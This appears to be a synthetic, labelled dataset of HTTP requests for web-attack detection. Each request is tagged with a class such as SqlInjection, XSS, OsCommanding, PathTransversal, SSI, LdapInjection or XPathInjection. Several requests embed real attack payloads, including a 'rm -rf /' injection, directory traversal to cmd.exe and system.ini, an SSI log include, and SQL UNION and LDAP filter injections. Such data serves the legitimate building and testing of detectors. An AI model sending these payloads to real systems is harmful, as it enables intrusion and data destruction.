GET /9e9/thau/KYpositionApositionL7cPqtMwgetI./sy.js?raow=nestipt+s2ni&0dhit=tdEe9&w4ce8id0ErenjU=eo4orabteesyebwmp&dztie=25&gw=e4+ifnbetweenel&1vdz4=wtho%2Fn%2FateeGa%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D7%5D+++or+%27Ng%27++%3D+++%27&cleeo7nas3ws=pD3seweegll+v&Efe67EseA6n9een=ygQdZuSdE&8i7KabinB0UKE=75&ohotryeoOmc=vae%2F+eiGz%5B&wop9fdratAar2=rmnEyEfptteml&pio2asMeqip=8239&ytrztnwenib=6600672&dCzhVb.ODJQ=0442405949 HTTP/1.1
Host: www.ldOsumzoo.st:04968
Connection: close
Accept: text/*, image/gif;q=0.0, text/xml;q=0.6
Accept-Charset: iso-8859-8;q=0.4, iso-10646-ucs-2, windows-1252;q=0.2
Accept-Encoding: compress, gzip;q=0.9, gzip, compress;q=0.8
Accept-Language: io4-Hlhcawi1, d0tez-I
Cache-Control: only-if-cached
Client-ip: 194.231.244.174
Cookie: uatMoheigqE=n=gsy mhhUtan;rseptetel8tt=4793;obnoifsh=]ru23Lseeh;6t8n=sZC1ROh2kx;hRBSe=unionto)i
Cookie2: $Version="259"
Date: Tue, 14 Jun 05 24:46:43 CET
ETag: "vPp0o9iOZjK@583"
Expect: 100-continue
From: tiaecs@atrtrnsru.ch
If-Modified-Since: Wed, 06 Jul 05 09:57:32 GMT
If-Unmodified-Since: Sun, 09 Oct 05 14:08:05 GMT
If-Match: "fKYBCvbJeO8B1QXb2Q@x"
If-None-Match: *
If-Range: *
Max-Forwards: 60
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: Basic b3JhZmEwdDplb3FyYXQ=
Range: 1-
Referer: http://syviyal.st/ouer1nr/mtteoe/cievEts/anhdadc/jwara.dll
TE: chunked,chunked;q=0.2,trailers
Trailer: Referer
User-Agent: ipmtalteseMt7yr
UA-CPU: StrongARM
UA-Disp: 3801,296,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 468x973
Via: 9.4 105.145.37.4:8818, HTTP/3.1 67.67.54.173, 1.6 www.EasavI.png
Transfer-Encoding: identity
Upgrade: enn72/7.1, EYeuT/2.5, saodes/7.2
Warning: 244 www.vcyjee.gif "iretosra" "Tue, 22 Jun 04 04:39:25 CET"
X-Forwarded-For: 91.195.205.35
X-Serial-Number: 68685203672775561
----: -------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 49121
Start - Id: 45685
class: PathTransversal
GET /l6atmrdA/oBFv0i16AH73jgb1N7/reesn5Eelgim/vm8HkYBdHO/ijmcp.O-f9/n9onse8oph/ehJbUMa0e6f5vYk/eirrse8.htm?Drdea2rieah6=f5ngo1d&osluos=..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini HTTP/1.0
Host: 53.138.176.21
Connection: close
Accept: image/*, application/*
Accept-Charset: *
Accept-Encoding: identity;q=0.8, gzip;q=0.7
Accept-Language: *
Cache-Control: no-store
Client-ip: 10.24.0.201
Cookie: tv=8l;selectorNF8=C6n;UJU4G9EuW5H=osrcninnn;dmy7ag5Xuo5tejP=78395511
Cookie2: $Version="55"
Date: Mon, 12 Jun 06 08:32:49 CET
ETag: "te5LXUt5O3OOLfUO"
Expect: to4thr
From: esIpsioy@eehlxsang.it
If-Modified-Since: Thu, 15 Nov 07 02:26:29 CET
If-Unmodified-Since: Tue, 18 Jul 06 02:20:19 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 16 Sep 04 14:57:47 GMT
Max-Forwards: 9902
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: Digest nc=dFd20C70
Authorization: Basic cmVnR3Jlbm46c21hYWs=
Range: -934,-807,-703421
Referer: http://www.S7pt.st/geset/uvserw/eebet4m/9fznnicS/eect.jsp
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/5.7 (Windows; U; Win98 8.4; ei-ml; rv:1.5.5) Gecko/91725300
UA-CPU: StrongARM
UA-Disp: 3926,182,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 488x430
Via: FTP/1.0 98.252.135.141:259
Transfer-Encoding: compress
Upgrade: Weyge/4.5, 12qen/6.1, nL6/9.1, 0dpMle/5.5, aosm8/0.7
Warning: 416 www.s8no.css "erg5ewnaswmt7ceb" "Wed, 30 Jan 08 22:16:24 GMT"
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 45685
Start - Id: 46724
class: XSS
GET /mhbtgnscene11hw5o/childf_/dIfTwc@fL/i8pnt8TaFy1Tf/znMewWWcT/ELgMWW.asmx?rykiKt=i-6&mu9e5nSepr9c=revalw&iaOO1svtpeifn=SS%28yetG%27Gjhn&hdlhortf1a=azl&uehevfremti=2 HTTP/1.1
Host: www.rdeeseo.be
Connection: rde6r
Accept: */*;q=0.0
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 39.211.86.194
Cookie: pnlerr=13;aoiielfRow=<xml    src   ="     javascript:[alert    ('ko22M');]     " >
Cookie2: $Version="199"
Date: Thu, 11 Aug 05 18:34:01 UTC
Expect: rara
From: yhntOe@t4sa9ttaYr.fr
If-Modified-Since: Mon, 07 Mar 05 12:42:11 GMT
If-Unmodified-Since: Fri, 25 Jun 04 22:29:16 GMT
If-Match: "Yn_VExAaDaL1.j_Q4Qd"
If-None-Match: *
If-Range: Sun, 04 Apr 04 06:53:55 UTC
Max-Forwards: 5921
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM ZTA0YmFFb3dlZXV2OWJzbGx1ZXJJeG9lRThsaTlsZmVwb2dlT3ltemdyYW8=
Referer: http://www.e7narm.com/e1oUnus/2jiprtN/1q5ctVh.msf
TE: deflate;q=0.1,trailers
Trailer: Date
User-Agent: Mozilla/6.0 (compatible; Konqueror/4.2; Linux i586; eyenae)
UA-CPU: 68000
UA-Disp: 7890,9337,16
UA-OS: Windows 98
Via: rdsp/4.3 www.sjciea.css:933, smh/1.6 211.57.163.247, FTP/3.7 125.43.181.208
Transfer-Encoding: identity
Upgrade: eTo/0.4, mceii/2.5
Warning: 811 www.ice8e2sa.htm "Sirlceliob7aol" "Wed, 13 Apr 05 17:59:47 UTC"
X-Forwarded-For: 101.237.144.23
----: -------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 46724
Start - Id: 40841
class: SSI
GET /tVtY_YOB82x2KMSI/execC-Ogj5ngbTupdateqi/r_dBq0hK00H/poinin3B3cil/x0AMBit/0sTBX8_cmdxmlicARG.exe?aur=8374&tN7hlibXV8zhttp=h%3AacceptaTpshutdownpo%28aevalec&ephiOnr0OMsgayZ=%3C%21--+%23odbc+connect%3D%22ee%2Cebncgt%2Czsto%22++++++statement%3D%22select++*++from++5ia7C%22--%3E&Qzd8ejpcthleush=Sg HTTP/1.1
Host: www.eS9yhhs.gov:43565
Connection: close
Accept: */*;q=0.7
Accept-Charset: x-mac-turkish, windows-1255;q=0.9, shift_jis;q=0.8, iso-10646-ucs-2;q=0.6, gb2312;q=0.7
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: no-cache
Client-ip: 75.99.25.245
Cookie: hnet=yvN;gu=y4wvsE2F
Cookie2: $Version="9"
Date: Wed, 30 Apr 08 06:27:30 GMT
ETag: W/"x_WgFNlnOH.LYnJBB"
Expect: 100-continue
From: ttntvsh@tetyoEibr.uk
If-Modified-Since: Sat, 29 Jan 05 10:25:30 UTC
If-Unmodified-Since: Tue, 12 Jun 07 16:27:34 UTC
If-Match: "xRhFoymkJFIDpQW"
If-None-Match: *
If-Range: Fri, 07 Apr 06 23:24:03 CET
Max-Forwards: 5198
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: Basic MWFhVG1EOnNsZW9l
Authorization: Digest response="cEb6DD0aCD503BCcB8d61C8bF90B183f"
Range: 68-,5-
Referer: /e7oqcl.gif
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/1.6 (Machintosh; U; PPC 7.5; Or-rd; rv:6.6.4) Gecko/25614984
UA-CPU: PowerPC
UA-Disp: 7808,940,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 266x239
Via: 9.1 www.syeee4.htm, HTTP/5.5 21.211.108.139, Aeo5on/8.3 213.101.214.233
Transfer-Encoding: gzip
Upgrade: smTMae/0.2
Warning: 409 198.101.208.57 "eean61TLsanwsEti" "Thu, 01 Apr 10 06:52:14 GMT"
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 546087958111322
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40841
Start - Id: 46214
class: PathTransversal
GET /nmTntrz/dras2Uk/8emLeOjeh8ew/BU/ecrnp/tlrfoo/lrybmsgenneoll5o/ihSb5z@aTCJayqZ2/ZincludegFshutdown6xmlUM-Y/nperrknoeuue5tohio3s.jpg?wgSK=zyeiImailfPm&fjbBD=013473&ehorlisndo=75377750&rSinuzto=s0_&w24deusnaesaEV=okkA0U1-&ia=920940&auteOfhriaeage=F%3A%2F.htaccess%7E&enomxoihg=6rP3anLZ&cit2deentt=aebh+ HTTP/1.1
Host: www.wbjgUeheon.ch:80
Connection: hxxw
Accept: application/*, video/mpeg;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: min-fresh=352
Client-ip: 244.185.69.193
Cookie: nSvuayEeloeiobT=4spametame9d gcoh;ktey0anaan=rxE24RapYXUO;rmsts9eai=sstt;ZEQZt=rO@0IK
Cookie2: $Version="6"
Date: Wed, 05 Oct 05 11:58:37 UTC
ETag: "lyp56_QbpqgxD-1"
Expect: ecm6rrof=7aeoed
From: xeibsrh@cIoaz0o30a.fr
If-Modified-Since: Fri, 06 Mar 09 22:45:35 CET
If-Unmodified-Since: Sat, 22 May 04 20:10:51 UTC
If-Match: *
If-None-Match: "VL4NFPxc6pSH6VtU"
If-Range: Fri, 11 Apr 08 09:49:52 UTC
Max-Forwards: 4282
MIME-Version: 5.5
Pragma: irO='cxcr'
Proxy-Authorization: nuit ePlSnli=Ews6alar
Authorization: Basic aDBlczptaWU5aQ==
Range: 63-8582,2-821656
Referer: /odArs.asp
TE: chunked,trailers
Trailer: Date
User-Agent: shurnrt
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6581x3968
Via: qhh/8.1 23.121.86.177:2189, rnu/1.6 209.151.91.137:296
Transfer-Encoding: aLnyd
Upgrade: esjpot/5.8, eni/8.5, tytox8/4.9
Warning: 048 www.olNtt.tiff "8Oh4bg22euilahgn" 
X-Forwarded-For: 249.22.33.20
X-Serial-Number: 79986231728889
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46214
Start - Id: 43404
class: OsCommanding
GET /yoboCgyne/e9aio/ntYTLvu0DQbLopN/rluge5ymk/h7u4Iw2-rB7Jm-XIvfj/OXsam_xL/abbHte/M_Dhe6Y_nHI4/Z_/3wX_H.jsp?tdpqC=ea5n&liichspaO=ehttps+e&dooRdV=01632575&isoTrPm=mniyai&utnls=s+&l6ON3YrRVI6=%60+rm++++-rf+++++%2F%60&v6rar=cbK.LxD56FT&.bgF2and1Nb=069&hme=36221 HTTP/1.1
Host: www.Qhyas.uk:36
Connection: ufeuzp
Accept: audio/x-wav;q=0.5, application/*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: iltt-oaje, infRzhw-hmooltvH;q=0.2, aoMoheg-aedetrP, siI22e-xoiies;q=0.3, EeaA-gder
Cache-Control: only-if-cached
Client-ip: 19.131.79.59
Cookie: rmso=ndoectrsnih;nasd=9omoousar5on;iedpchemhiasT=047973341;5rdcsaw4=zp
Cookie2: $Version="4"
Date: Tue, 15 Jun 04 05:08:57 GMT
ETag: W/"FBRRehdBHitCX2E"
Expect: n0nee
From: su7olsim@shSdnne.cz
If-Modified-Since: Tue, 12 Dec 06 17:39:07 GMT
If-Unmodified-Since: Sun, 16 Apr 06 09:21:15 UTC
If-Match: *
If-None-Match: "Zx4BT_YUvjsydfT"
If-Range: *
Max-Forwards: 4728
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest uri=http://mertS.cz/iitepr/E6ydsge.msf
Range: -4315,8885-439,063-
Referer: /5rae86ct/po122rfa/e2i1/ttoeaeot.pl
TE: chunked;q=0.3
Trailer: If-Range
User-Agent: sll8o1ecbtfsbr4taieo
UA-CPU: 68000
UA-Disp: 3207,5717,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 9788x122
Via: t8h/0.5 180.32.184.80:2246, 4.3 250.251.227.123, xedy/3.9 www.5axidlj.css
Transfer-Encoding: identity
Upgrade: zos/3.8, LrxEi/5.1
Warning: 667 www.eekudeq.shtml "ep6tpihnare" 
X-Forwarded-For: 207.33.218.68
X-Serial-Number: 64752723331418038
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43404
Start - Id: 44093
class: OsCommanding
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.oTasd.uk
Connection: yrfNohd
Accept: application/*;q=0.6, text/html
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=1814
Client-ip: 237.235.110.125
Cookie: pOaaeuia8eog= h;8mcbiIJooesn=m7m;ea9dgAasa=du9Oe4sid;5.dnj=8nYFty0c
Cookie2: $Version="94"
Date: Tue, 05 May 09 12:04:04 UTC
ETag: "ZS9GbP3St8Y_vcI."
Expect: 100-continue
From: ixam@eaec.uk
If-Modified-Since: Mon, 07 Nov 05 13:11:27 UTC
If-Unmodified-Since: Mon, 13 Sep 04 18:15:49 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 27 Mar 07 15:16:41 GMT
Max-Forwards: 5
MIME-Version: 0.4
Pragma: tpee3pwh=etrzuti
Proxy-Authorization: NTLM YTlha3RlZjlua29weWVzb2s3MW5yemFoMm5wbk4waVJzZW9ndG4zTGhpOGh0aQ==
Authorization: Basic YmlvdHRicG46R2hvY2N5dA==
Range: 70-
Referer: /matlYoz/a7hnu.pl
TE: chunked
Trailer: If-Match
User-Agent: lSIv1Ws http://www.eHoienH.com
UA-CPU: x86
UA-Disp: 6409,6413,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 1501x189
Via: HTTP/3.0 135.149.112.57
Transfer-Encoding: hOUe
Upgrade: unHis2/9.7, sDw/8.7
Warning: 521 www.mjfat.css "dRa1e4l2ilrotmytl" "Sun, 12 Nov 06 05:55:58 UTC"
X-Forwarded-For: 91.48.222.8
X-Serial-Number: 388289600968011
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44093
Start - Id: 37760
class: LdapInjection
GET /1FLMS1vd.bin?ikiod=trRnqa9do9tdedas%7E%27b&iT7v7httpq=bp9zoreigtttlu&nbidrstaNqNTm=xa7o%29%28%26%28objectClass+%3D+he*%29 HTTP/1.0
Host: www.t39eut6d.de
Connection: close
Accept: */*;q=0.5
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: rvpe-3erEizs;q=0.8, qfk-6Mrq;q=0.7
Cache-Control: min-fresh=852
Client-ip: 28.9.182.133
Cookie: dtn=17182;tr9r5pa4rbr=&Cd;hwDs=wt;ysl=hechildh;tiis69=dP5DIOxUV;48Lsysteminsert7Vqa=ofnust
Cookie2: $Version="51"
Date: Tue, 31 Jan 06 05:28:29 UTC
ETag: W/"ud0ipGZ2us1mYZDzhVQc"
Expect: atsAq
From: fssGmo@tsxudTxl.fr
If-Modified-Since: Tue, 12 Sep 06 04:22:45 CET
If-Unmodified-Since: Wed, 27 Apr 05 11:55:22 GMT
If-Match: *
If-None-Match: "5DnzHxrvmrh1thg"
If-Range: "d9PISRG.MZaoAeAaY2wC"
Max-Forwards: 19
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: Basic dHJvZWh2TjpwaGVydHNl
Authorization: Basic TmllbGFlbmM6SXdsa2Fjcw==
Range: 6-
Referer: http://www.a5trstt.gov/saaecmw.css
TE: trailers
Trailer: Proxy-Authorization
User-Agent: d0rO6L08 http://www.s6na.gov
UA-CPU: MIPS
UA-Disp: 3833,663,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 807x162
Via: 4.7 237.96.107.82:2, 5.5 www.uhaCz.png, FTP/7.8 91.64.194.212:43
Transfer-Encoding: amphn
Upgrade: si0/4.3, ewgHho/5.9, yibiRd/8.8, ahmafn/5.3
Warning: 397 www.estmthgu.jpeg "iqcdxmusey4i3" 
X-Forwarded-For: 49.81.169.152
X-Serial-Number: 753563632869650663
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 37760
Start - Id: 48497
class: XPathInjection
PUT /eYQ5wT/rE0msopbctmdc/c3fxJ_@0/t34x2l/Kc8aryrntnT1hi9eeir/mhosr5enym12n/leI9tt5etafaksEv.gif? HTTP/1.1
Content-Length: 279
Content-Language: r
Content-Encoding: identity
Content-Location: http://ldegoy.com/rheeyni/nhIuaon.wav
Content-MD5: b2RlbGhvaWFhaTdia01mYg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 21 Jan 08 17:34:27 CET
Last-Modified: Sun, 23 Apr 06 02:18:15 CET
Host: www.itoerul.biz
Connection: wmoii
Accept: application/*;q=0.2, text/*;q=0.2
Accept-Charset: utf-8;q=0.7, iso-8859-1;q=0.4, x-mac-arabic
Accept-Encoding: *;q=0.6
Accept-Language: g-2o;q=0.9, h1tt-jto1a9
Cache-Control: min-fresh=4
Client-ip: 186.162.234.129
Cookie2: $Version="8"
Date: Wed, 26 Dec 07 16:58:43 GMT
ETag: W/"Z8k6MID8rdOhM91kgfF"
From: numhoTo@rsni1ore.com
If-Modified-Since: Fri, 21 Jul 06 11:28:34 GMT
If-Match: "36YBOh8QT-xqyFEfMK"
If-None-Match: "Z989yHaJOyFT2C5a99i@"
Max-Forwards: 922
Authorization: NTLM ZW5hZmVlbm9yYU9mbXNuZ256M1llZTRvSml6dG9GcjZpcHh0c2VDb3l0bg==
Referer: /mt2ng/crzO7e/3isds/d1ause/nntsn1i.mdb
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/3.6 (Machintosh; U; Mac OS X 8.4; Ya-2s; rv:1.7.0) Gecko/27264230
X-Serial-Number: 01871
----: -----------------------------

ot8reoeftswamu=6   or   1<   pc9ete/f/wtg/child::text()[position()=273]   or   7204='] | /* | /foo[bar='&tferoirg7t=4040730&8ZMbin1@jnC=600202&S7lhyorlo=meo&tirh=oHQxc&5arqeqtioct=37070&n4docsqeawtj=n8_WIYW3&dey3tSjt=ps9rtm0daTs e9si

End - Id: 48497
Start - Id: 39662
class: SSI
GET /oaiyoletxIuA4enr/br/32M-G.html?njknsb9=Rn%25e4sa&ahishbtf=miepiosntr&5hApwheredDegG=r6%5Cxmlyiertkihaccess_logm&ioErl4=ufhsm4eo6ie&hrs=txpid&ajRtes=3&nq=tmm4r&tdtDHonullWa_=aeekoieq&i2eabwc9c=qF0oQ&ecro6ahwn89Nhn=%27lib&TBwnyIftpservicesYGAU=%3C%21--+++++%23include+virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22++++--%3E&nuawSewJcrntr=185560769&lbgidStnEi=9HichnPest3rl&hOoHaci=hznrYRMVG HTTP/1.0
Host: www.tsfrnHnya.de
Connection: close
Accept: application/postscript, text/*;q=0.4, application/*
Accept-Charset: x-mac-chinesetrad;q=0.1, us-ascii, x-mac-turkish;q=0.4, x-mac-japanese, iso-8859-6;q=0.1
Accept-Encoding: deflate;q=0.2, gzip;q=0.2, compress;q=0.4, compress
Accept-Language: r-CrteEior;q=0.4, cy-ge, eifm-p;q=0.7
Cache-Control: min-fresh=9228
Client-ip: 64.186.223.135
Cookie: xopetx4ileralwv=jeEoaaracih;nodu=636
Cookie2: $Version="811"
Date: Fri, 29 Jan 10 05:39:20 GMT
ETag: W/"DjzoEKQNI9ad3TMI8QLe"
Expect: 100-continue
From: l5vtEst@R8caTefna.fr
If-Modified-Since: Wed, 09 Feb 05 13:16:29 CET
If-Unmodified-Since: Mon, 04 May 09 01:25:03 CET
If-Match: "B@3VoxY.xDKOy5mo"
If-None-Match: "G7ifQuf7D1dgv_5QN6"
If-Range: Tue, 23 Sep 08 05:26:30 CET
Max-Forwards: 689
MIME-Version: 3.9
Pragma: a=yboSa
Proxy-Authorization: NTLM Mm41YzRyZ2VsbDdzbWxhdHRyeXRzbm1jaHNtc245aXQ=
Authorization: Basic YnRlczpuc29lcGNlMg==
Range: -7190
Referer: http://EoRoNi.net/swey1yri/osoen/aypr.swf
TE: trailers,trailers,chunked
Trailer: Date
User-Agent: 98z9vb http://www.e6i6ci.fr
UA-CPU: PowerPC
UA-Disp: 9927,407,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 8969x195
Via: uii/7.4 95.143.107.144:4593
Transfer-Encoding: identity
Upgrade: iw6k/3.2, ans3Du/7.4, m5dr/5.3
Warning: 273 www.Sneje.htm "srzSNAitebchch" "Mon, 20 Dec 04 23:29:19 UTC"
X-Forwarded-For: 50.214.174.78
X-Serial-Number: 659531112
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 39662
Start - Id: 38106
class: LdapInjection
GET /6TEKCshutdownyfYWMg/cnk3enp/Eithto9ayiOol8/ekl867Bu-eadrpZWV/seifytitt/laDCwinipuan/skw39eEc9.nsf?rdean5laaotnw=wqHwz&n12ealisEtdc6t=iOeernalsIHn9he&@3fAgGhGl8M=1copy&yFW3wi=982&2v2osrrta=lo8te2i6entoA5&orpecslrxel=w%3Di&zKBconnectsFldPCA=eaE4%29%28%26%28objectClass++++%3D++++hri*%29&lhbo=Xruah6w5w&n4dp=8562 HTTP/1.0
Host: 50.50.138.93
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: deflate;q=0.8, identity;q=0.4
Accept-Language: *
Cache-Control: no-cache
Client-ip: 223.239.75.68
Cookie: aa8a=od;.sRIf@6v=21923;aure3toh9otu=eiuimgs;yteeT=roV;eyIionon=nx864w$&t7wnahmw(l
Cookie2: $Version="3"
Date: Mon, 25 Dec 06 03:49:08 UTC
ETag: "Zj4yOJLgWxL5jkoqj"
Expect: yzytf=wi36hMoe
From: gnhjruh@dteigtlw.biz
If-Modified-Since: Thu, 09 Jul 09 07:04:49 GMT
If-Unmodified-Since: Mon, 08 Oct 07 01:50:31 GMT
If-Match: "-do@nSPAOBoysd0"
If-None-Match: *
If-Range: Mon, 20 Jun 05 12:46:55 UTC
Max-Forwards: 682
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: ntddnv dr9t=oezhv
Authorization: Digest response="611D89e5d2CEa6Fc2EC3E6B420C42D6a"
Range: -26705,8389-9530,6-32
Referer: /aarxr/errrr/npid.txt
TE: chunked,deflate;q=0.7,trailers
Trailer: Trailer
User-Agent: Mozilla/8.9 (compatible; MSIE 7.1; Open BSD i586; xmiigr; eaini)
UA-CPU: StrongARM
UA-Disp: 072,9161,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3700x2595
Via: HTTP/3.2 149.27.137.253
Transfer-Encoding: deflate
Upgrade: ifowud/4.0, tto/4.9, xoi/9.2, yMow/1.8, ttyat/1.1
Warning: 144 20.10.204.100 "scbn8telndd3" "Sun, 20 Feb 05 17:46:24 UTC"
X-Forwarded-For: 174.234.21.215
X-Serial-Number: 2885123328233620
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38106
Start - Id: 42702
class: SqlInjection
PUT /df7vR/uZn.png? HTTP/1.1
Content-Length: 165
Content-Language: an9rq,ludH
Content-Encoding: identity
Content-Location: /smsyn.jsp
Content-MD5: dHh5ZWFpaHR5c3Rvc2VxeA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 12 Jan 09 19:51:05 GMT
Last-Modified: Sun, 22 Oct 06 24:38:47 CET
Host: 119.25.9.147
Connection: rsaey
Accept: video/*;q=0.7
Accept-Charset: iso-8859-5
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=0339
Client-ip: 228.125.37.130
Cookie: ethQargesecl975= 7s
Cookie2: $Version="4"
Date: Mon, 24 Apr 06 07:24:17 CET
ETag: W/"4C7tksCaaomG@_1Ns"
Expect: thse=41osoq;itilCa
From: neeio@ame9cqfri.it
If-Modified-Since: Thu, 05 Feb 04 08:10:03 UTC
If-Unmodified-Since: Mon, 27 Mar 06 04:30:01 GMT
If-Match: "HFrqNg92I3feIq2Wc"
If-None-Match: *
If-Range: "3jWM@b6bqZ8asOM"
Max-Forwards: 73
MIME-Version: 4.7
Pragma: nfp=i
Proxy-Authorization: Digest opaque="bii1e"
Authorization: Basic b253YWFubjpjaXFoYw==
Range: -124964,11478-05
Referer: /ki9aumt/eay2di/sii6ee.png
TE: deflate;q=0.2,trailers
Trailer: Accept-Language
User-Agent: rosn9i' UNION    ALL  SELECT  re    FROM    ci  WHERE   ''=    '
UA-Disp: 179,0813,8
UA-OS: Windows 98
UA-Color: color16
Via: FTP/7.2 www.hiErohi.jpg, fli/4.9 51.216.78.128, FTP/0.6 191.255.65.86
Transfer-Encoding: teoe; woTajuGR=risocsYn
Upgrade: stwept/3.7, 3caoys/9.9
Warning: 745 www.otrKU.jpeg "mdsiI" "Sun, 31 Jul 05 23:34:34 CET"
X-Forwarded-For: 29.202.205.12
X-Serial-Number: 0088484140288112965
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

ll3i=logd)&rera=ia&rsves=2718374&Dwntvyg5rlh=nzorj&ethtdpRooawcue=nt5&mlPsV820acY6r=hCllo?opnconnectjcmdl&ft2lea=unfiu&oniiW7=odrk&tlr=cahrtraas&nlNdg8r= mrcptdf

End - Id: 42702
Start - Id: 44667
class: PathTransversal
GET /9H2oivhs4MSj1pyR/en3ataTa5hdaeosau/.andPwp-kRQunionissWWKm/lhqoblztgadh/actyna/3P0/ttpe/nRiy.lVq5knz6uxKH2dl/vqJnF/WEL6/ArUG@Xle.html? HTTP/1.1
Host: www.6eiBhe7ee.net
Connection: 7qsmb
Accept: */*
Accept-Charset: windows-1252, euc-cn, iso-8859-1, iso-8859-8-i
Accept-Encoding: identity, compress, deflate
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 47.118.94.95
Cookie: pNi.0sB0shutdownJ=ia0e\%tbnph-eo;8uLaenxt=i1e2dn;rmooohgOayulwa=../../../usr/dsqqdsqsd.xml;vct=Nxmlchild
Date: Sat, 22 Dec 07 17:00:19 CET
ETag: "Wb4rFHP0X1Jc6ektHn"
From: Jatw@uras.it
If-Modified-Since: Mon, 17 Nov 08 07:45:14 GMT
If-Unmodified-Since: Tue, 29 Nov 05 21:33:51 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 14 Jan 07 21:29:09 GMT
Max-Forwards: 178
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: etOx mtcLY=aeczc
Authorization: ietwhn uraniar=eoeggtt
Range: 267-5496
Referer: /Basgec/nozouhl/tgV6.mpeg
TE: deflate;q=0.9,deflate;q=0.8
User-Agent: Mozilla/8.9 (X11; U; Open BSD i586 0.4; ut-ce; rv:4.0.4) Gecko/47083656
UA-OS: WinNT
UA-Pixels: 014x987
Via: 2.6 49.171.93.147, tDt/7.6 www.nenet5.shtml:36586
Transfer-Encoding: gzip
X-Forwarded-For: 34.52.64.101
X-Serial-Number: 72425044847598734540

null

End - Id: 44667
Start - Id: 37810
class: LdapInjection
GET /IT6Sgv8lLV/oheray/srinbethff/o@UxNN.shtml?hY1rdta0n=844%29%28%26%28objectClass%3Deog%29%28%7C%28sn+++%3D++++rnrt%29%28cn%3Dllsi++J*%29%29&crustst5vrhuaT=26480 HTTP/1.0
Host: 63.173.156.33
Connection: keep-alive
Accept: audio/x-wav;q=0.3
Accept-Charset: x-mac-chinesesimp;q=0.8
Accept-Encoding: deflate;q=0.7, identity, identity;q=0.1
Accept-Language: *
Cache-Control: ddc4ht=eo
Client-ip: 172.140.190.216
Cookie: oeiBmt=hdivib;spnrdb=1r;wjd6Z=0;si=ta
Cookie2: $Version="55"
Date: Sat, 08 Nov 08 16:10:19 GMT
ETag: W/"73onUuR9.zMCXKlol1M"
Expect: asc8a
From: eiuLl1hr@buwsjfa.cz
If-Modified-Since: Sun, 20 Nov 05 20:20:41 GMT
If-Unmodified-Since: Thu, 23 Apr 09 17:17:29 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 22 Dec 07 24:10:43 GMT
Max-Forwards: 534
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Basic bmVvdDZzOndpdGNvcQ==
Authorization: Basic dDFsUjp4aGVpdA==
Range: 3012-675
Referer: http://www.1alomI0D.be/s0pEol/qs9oNlB/0FtedA7/ocne.pdf
TE: gzip,gzip;q=0.6,gzip
Trailer: Connection
User-Agent: i3nWHP http://www.tbzuifo.biz
UA-CPU: x86
UA-Disp: 3820,0444,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2010x029
Via: 7.1 www.dsotcea.tiff, 2.0 5.236.158.57
Transfer-Encoding: gzip
Upgrade: ziaeo/3.7, fyav/7.8, dpa0ed/1.0, mfirt/0.2, pSli/6.6
Warning: 129 www.uqhu9nc.htm "laft4oha" 
